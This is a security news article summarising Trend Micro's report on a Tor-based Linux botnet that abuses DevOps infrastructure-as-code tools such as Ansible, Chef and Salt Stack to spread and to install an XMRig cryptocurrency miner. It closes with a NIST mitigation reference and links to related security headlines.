Security researchers have spotted Tor-based botnet malware that targets Linux systems and cloud management tools to spread malware on victims’ networks.
According to Trend Micro, the malware leverages multiple “emerging techniques” to target Linux systems such as use of Tor (The Onion Router) through a network of proxies via the Socks5 protocol. The actors download tools (such as ss, ps and curl) and malicious scripts via the Tor network onto victim computers.
Moreover, attackers also abuse DevOps cloud tools (e.g., Ansible, Chef, and Salt Stack) to further spread malware to other systems. In fact, the security experts further warned this is the first time they have noticed attackers’ abuse of infrastructure-as-code (IaC) tools for spreading malware.
“Their weaponization of IaC tools suggests that these malicious actors are also well aware of the adoption of new technologies nowadays. More instances of malicious actors hitching on new trends to facilitate their campaigns will likely emerge in the foreseeable future,” Trend Micro wrote in a blog post.
Furthermore, centralized management or DevOps tools can be a huge threat since they have higher level of privileges and are used to automate and deploy code/software on many systems throughout the enterprise. In fact, many organizations already have discovered similar threats with the recent SolarWinds and Azure/M365 cyberattacks.
Other techniques used by the actors included the use of Unix shell scripts in their attacks:
“We also found another technique that the malware uses to perform HTTP requests using shell script and Unix system design, as opposed to using binaries like curl or wget, to get more information on the infected systems.”
The researchers further noted the analyzed malware sample included a cryptocurrency miner, in the form of the Monero (XMR) miner XMRig. The malware also is capable of removing other malicious cryptocurrency miners that may have already been installed on systems.
For mitigation guidance, readers can also check out Security-Focused Configuration Management of Information Systems guidelines (SP 800-128) published by the National Institute of Standards and Technology (NIST).
- NSA: Guidance to mitigate cloud vulnerabilities
- CHIRP tool scans for signs of APT compromise associated with SolarWinds and Azure/M365 cyberattacks
- Microsoft and FireEye reveal new details on SolarWinds cyberattack
- FireEye publishes Microsoft 365 tools and hardening strategies to defend against SolarWinds attackers
- WannaMine Crypto-mining malware